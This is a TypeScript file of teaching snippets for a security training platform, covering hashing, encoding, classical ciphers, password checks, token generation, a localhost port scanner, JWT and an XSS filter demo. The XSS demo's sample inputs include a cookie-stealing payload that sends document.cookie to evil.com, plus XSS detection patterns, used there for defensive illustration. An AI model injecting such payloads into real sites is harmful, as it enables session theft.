import type { Snippet } from './types';

export const API_BASE = '/api/execute';

export const SNIPPET_CATEGORIES = [
  '密码学 / 加密', '密码学 / 哈希', '密码学 / 古典密码',
  '密码学 / 密码策略', '网络安全 / 侦察', '网络安全 / 鉴权',
  '网络安全 / 令牌', 'Web安全 / XSS防护',
];

export const SNIPPETS: Snippet[] = [
  { id: 'py-hash', language: 'python', category: '密码学 / 哈希', title: '使用 hashlib 计算文件/字符串哈希', description: 'MD5、SHA1、SHA256 哈希计算，适用于文件完整性校验', code: 'import hashlib\n\ndef compute_hashes(data: str):\n    """计算字符串的多种哈希值"""\n    print(f"原文: {data}")\n    print(f"MD5:    {hashlib.md5(data.encode()).hexdigest()}")\n    print(f"SHA1:   {hashlib.sha1(data.encode()).hexdigest()}")\n    print(f"SHA256: {hashlib.sha256(data.encode()).hexdigest()}")\n\ncompute_hashes("CISP安全培训-2025")\n' },
  { id: 'py-encrypt', language: 'python', category: '密码学 / 加密', title: 'Base64 编解码', description: '安全场景中常见的数据编码/解码操作', code: 'import base64\n\noriginal = "admin:超级密码@2025"\nprint(f"原文: {original}")\n\n# 编码\nencoded = base64.b64encode(original.encode()).decode()\nprint(f"Base64编码: {encoded}")\n\n# 解码\ndecoded = base64.b64decode(encoded).decode()\nprint(f"Base64解码: {decoded}")\n\n# URL 安全编码 (常用于JWT、Token传输)\nurl_safe = base64.urlsafe_b64encode(original.encode()).decode()\nprint(f"URL安全编码: {url_safe}")\n' },
  { id: 'py-caesar', language: 'python', category: '密码学 / 古典密码', title: '凯撒密码加解密', description: '理解古典替换密码的加解密原理', code: 'def caesar_encrypt(text: str, shift: int) -> str:\n    """凯撒密码加密"""\n    result = []\n    for ch in text:\n        if ch.isalpha():\n            base = ord(\'A\') if ch.isupper() else ord(\'a\')\n            result.append(chr((ord(ch) - base + shift) % 26 + base))\n        else:\n            result.append(ch)\n    return \'\'.join(result)\n\ndef caesar_decrypt(text: str, shift: int) -> str:\n    """凯撒密码解密"""\n    return caesar_encrypt(text, -shift)\n\ndef brute_force_decrypt(text: str):\n    """暴力破解凯撒密码"""\n    print("尝试所有偏移量:")\n    for shift in range(26):\n        print(f"  shift={shift:2d}: {caesar_decrypt(text, shift)}")\n\nmessage = "CISP Security Training"\nencrypted = caesar_encrypt(message, 5)\nprint(f"原文: {message}")\nprint(f"加密 (shift=5): {encrypted}")\nprint(f"解密: {caesar_decrypt(encrypted, 5)}")\nprint()\nbrute_force_decrypt(encrypted)\n' },
  { id: 'py-password-check', language: 'python', category: '密码学 / 密码策略', title: '密码强度检测器', description: '检查密码是否符合安全策略', code: 'import re\n\ndef check_password_strength(password: str) -> dict:\n    issues = []\n    score = 0\n    if len(password) >= 12: score += 25\n    elif len(password) >= 8:\n        score += 15\n        issues.append("建议密码长度 >= 12")\n    else: issues.append("密码长度不足8位，严重不安全")\n    if re.search(r\'[A-Z]\', password): score += 15\n    else: issues.append("缺少大写字母")\n    if re.search(r\'[a-z]\', password): score += 15\n    else: issues.append("缺少小写字母")\n    if re.search(r\'\\\\d\', password): score += 15\n    else: issues.append("缺少数字")\n    if re.search(r\'[!@#$%^&*(),.?":{}|<>]\', password): score += 15\n    else: issues.append("缺少特殊字符")\n    if re.search(r\'(password|123456|admin|qwerty)\', password, re.I):\n        score = max(0, score - 30)\n        issues.append("包含常见弱密码模式")\n    level = "强" if score >= 75 else "中" if score >= 50 else "弱"\n    return {"score": score, "level": level, "issues": issues}\n\ntest_passwords = ["admin123", "MyPa$$w0rd!", "Abc@2025Secure#X"]\nfor pwd in test_passwords:\n    result = check_password_strength(pwd)\n    print(f"\\n密码: {pwd}")\n    print(f"  强度: {result[\'level\']} ({result[\'score\']}/100)")\n    if result[\'issues\']:\n        for issue in result[\'issues\']:\n            print(f"   - {issue}")\n' },
  { id: 'py-token-gen', language: 'python', category: '网络安全 / 令牌', title: '安全随机令牌生成器', description: '使用 secrets 模块生成 API Key / Session Token', code: 'import secrets\nimport string\n\ndef generate_token(length=32, charset=None):\n    if charset is None:\n        charset = string.ascii_letters + string.digits\n    return \'\'.join(secrets.choice(charset) for _ in range(length))\n\ndef generate_api_key():\n    return f"cisp_{secrets.token_hex(24)}"\n\ndef generate_session_id():\n    return secrets.token_urlsafe(32)\n\nprint("=== 安全令牌生成 ===")\nprint(f"API Key:   {generate_api_key()}")\nprint(f"Session:   {generate_session_id()}")\nprint(f"密码重置: {generate_token(16)}")\nprint(f"十六进制: {secrets.token_hex(16)}")\n\nprint(f"\\n生成 1000 个令牌，前5个:")\nfor i in range(5):\n    print(f"  [{i+1}] {secrets.token_hex(8)}")\n' },
  { id: 'py-port-scan', language: 'python', category: '网络安全 / 侦察', title: '简易端口扫描器', description: 'TCP连接探测（仅教学用途）', code: 'import socket\n\ncommon_ports = {21:"FTP",22:"SSH",23:"Telnet",25:"SMTP",53:"DNS",80:"HTTP",110:"POP3",143:"IMAP",443:"HTTPS",3306:"MySQL",3389:"RDP",5432:"PostgreSQL",6379:"Redis",8080:"HTTP-Alt",8443:"HTTPS-Alt"}\n\ndef scan_port(host, port, timeout=1):\n    try:\n        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n            s.settimeout(timeout)\n            return s.connect_ex((host, port)) == 0\n    except: return False\n\ntarget = "127.0.0.1"\nprint(f"扫描目标: {target}")\nfor port, svc in sorted(common_ports.items()):\n    status = "🟢 开放" if scan_port(target, port) else "🔴 关闭"\n    print(f"{port:6d} {svc:12s} {status}")\nprint("\\n[教育用途] 未经授权扫描他人系统属于违法行为")\n' },
  { id: 'js-crypto', language: 'javascript', category: '密码学 / 加密', title: 'Node.js crypto 哈希与加解密', description: '使用内置 crypto 模块哈希和AES加密', code: 'const crypto = require(\'crypto\');\n\nfunction hash(data, algorithm = \'sha256\') {\n  return crypto.createHash(algorithm).update(data).digest(\'hex\');\n}\n\nconst secret = "CISP安全培训平台";\nconsole.log(\'原文:\', secret);\nconsole.log(\'SHA256:\', hash(secret));\nconsole.log(\'MD5:\', hash(secret, \'md5\'));\n\nfunction encrypt(text, key) {\n  const iv = crypto.randomBytes(16);\n  const cipher = crypto.createCipheriv(\'aes-256-cbc\', key, iv);\n  let encrypted = cipher.update(text, \'utf8\', \'hex\');\n  encrypted += cipher.final(\'hex\');\n  return iv.toString(\'hex\') + \':\' + encrypted;\n}\n\nfunction decrypt(combined, key) {\n  const [ivHex, encrypted] = combined.split(\':\');\n  const decipher = crypto.createDecipheriv(\'aes-256-cbc\', key, Buffer.from(ivHex, \'hex\'));\n  let decrypted = decipher.update(encrypted, \'hex\', \'utf8\');\n  decrypted += decipher.final(\'utf8\');\n  return decrypted;\n}\n\nconst encKey = crypto.randomBytes(32);\nconst message = "敏感数据: api_key=sk-abc123";\nconst ciphertext = encrypt(message, encKey);\nconsole.log(\'\\n密文:\', ciphertext);\nconsole.log(\'解密:\', decrypt(ciphertext, encKey));\nconsole.log(\'\\n随机令牌:\', crypto.randomBytes(24).toString(\'hex\'));\n' },
  { id: 'js-jwt', language: 'javascript', category: '网络安全 / 鉴权', title: 'JWT 令牌解析与验证演示', description: '模拟 JWT 签发和验证过程', code: 'const crypto = require(\'crypto\');\n\nfunction base64url(source) {\n  return Buffer.from(source).toString(\'base64url\');\n}\n\nfunction sign(payload, secret) {\n  const header = base64url(JSON.stringify({ alg: \'HS256\', typ: \'JWT\' }));\n  const body = base64url(JSON.stringify(payload));\n  const signature = crypto.createHmac(\'sha256\', secret).update(header + \'.\' + body).digest(\'base64url\');\n  return header + \'.\' + body + \'.\' + signature;\n}\n\nfunction verify(token, secret) {\n  const parts = token.split(\'.\');\n  if (parts.length !== 3) return { valid: false, reason: \'格式错误\' };\n  const payload = JSON.parse(Buffer.from(parts[1], \'base64url\').toString());\n  const expected = sign(payload, secret);\n  return { valid: token === expected, payload: token === expected ? payload : null,\n    reason: token === expected ? null : \'签名不匹配 — 令牌被篡改!\' };\n}\n\nconst jwtSecret = crypto.randomBytes(32).toString(\'hex\');\nconst userPayload = { sub: \'user_001\', name: \'安全工程师\', role: \'admin\',\n  iat: Math.floor(Date.now()/1000), exp: Math.floor(Date.now()/1000)+3600 };\n\nconst token = sign(userPayload, jwtSecret);\nconsole.log(\'签发 JWT:\');\nconsole.log(token);\n\nconst result1 = verify(token, jwtSecret);\nconsole.log(\'\\n验证(合法):\', result1.valid ? \'✅ 通过\' : \'❌ 失败\');\n\nconst fakeToken = token.slice(0, -5) + \'xxxxx\';\nconst result2 = verify(fakeToken, jwtSecret);\nconsole.log(\'\\n验证(伪造):\', result2.valid ? \'✅ 通过\' : \'❌ 失败\', result2.reason);\n' },
  { id: 'js-xss-filter', language: 'javascript', category: 'Web安全 / XSS防护', title: 'XSS输入过滤演示', description: 'HTML实体转义防止跨站脚本攻击', code: 'function escapeHtml(unsafe) {\n  return unsafe.replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;").replace(/"/g,"&quot;").replace(/\'/g,"&#039;");\n}\n\nconst userInputs = [\n  \'<script>alert("XSS攻击!")</script>\',\n  \'<img src=x onerror="fetch(\\\'http://evil.com/?c=\\\'+document.cookie)">\',\n  \'正常用户名_张三\',\n  \'<a href="javascript:void(0)" onclick="steal()">点击领奖</a>\',\n];\n\nconsole.log(\'=== XSS 过滤演示 ===\\n\');\nuserInputs.forEach((input, i) => {\n  const safe = escapeHtml(input);\n  console.log(`输入[${i+1}]: ${input}`);\n  console.log(`  安全: ${safe}`);\n  console.log(`  ${input !== safe ? \'⚠️ 检测到恶意载荷\' : \'✅ 安全输入\'}\\n`);\n});\n\nfunction detectXSS(input) {\n  const patterns = [/<script[^>]*>/i, /on\\\\w+\\\\s*=/i, /javascript\\\\s*:/i, /<iframe/i, /eval\\\\s*\\\\(/i];\n  return patterns.some(p => p.test(input));\n}\n\nconsole.log(\'=== XSS 检测 ===\');\nuserInputs.forEach(input => console.log(detectXSS(input) ? \'🚨 危险\' : \'✅ 安全\', \'-\', input.substring(0,40)));\n' },
  { id: 'java-hash', language: 'java', category: '密码学 / 加密', title: 'Java MessageDigest 哈希计算', description: 'MD5/SHA-256 哈希', code: 'import java.security.MessageDigest;\n\npublic class Main {\n    static String bytesToHex(byte[] bytes) {\n        StringBuilder sb = new StringBuilder();\n        for (byte b : bytes) sb.append(String.format("%02x", b));\n        return sb.toString();\n    }\n    static String hash(String input, String alg) throws Exception {\n        MessageDigest md = MessageDigest.getInstance(alg);\n        return bytesToHex(md.digest(input.getBytes()));\n    }\n    public static void main(String[] args) throws Exception {\n        String pwd = "MySecurePass@2025";\n        System.out.println("原文: " + pwd);\n        System.out.println("MD5:    " + hash(pwd, "MD5"));\n        System.out.println("SHA-256:" + hash(pwd, "SHA-256"));\n        String h1 = hash("MySecurePass@2025", "SHA-256");\n        String h2 = hash("MySecurePass@2026", "SHA-256");\n        System.out.println("\\n雪崩效应: 仅差1个字符，哈希完全不同");\n        System.out.println("  " + h1.substring(0,32) + "...");\n        System.out.println("  " + h2.substring(0,32) + "...");\n    }\n}\n' },
  { id: 'java-base64', language: 'java', category: '密码学 / 加密', title: 'Java Base64 编解码 + 安全随机数', description: 'Base64/URL安全编码 + SecureRandom', code: 'import java.util.Base64;\nimport java.security.SecureRandom;\n\npublic class Main {\n    static String bytesToHex(byte[] bytes) {\n        StringBuilder sb = new StringBuilder();\n        for (byte b : bytes) sb.append(String.format("%02x", b));\n        return sb.toString();\n    }\n    public static void main(String[] args) {\n        String original = "CISP安全培训: 用户凭证演示";\n        System.out.println("原文: " + original);\n        String encoded = Base64.getEncoder().encodeToString(original.getBytes());\n        System.out.println("Base64: " + encoded);\n        System.out.println("解码: " + new String(Base64.getDecoder().decode(encoded)));\n        System.out.println("URL安全: " + Base64.getUrlEncoder().withoutPadding().encodeToString(original.getBytes()));\n        SecureRandom rand = new SecureRandom();\n        byte[] token = new byte[24]; rand.nextBytes(token);\n        System.out.println("\\n会话令牌: " + bytesToHex(token));\n    }\n}\n' },
];
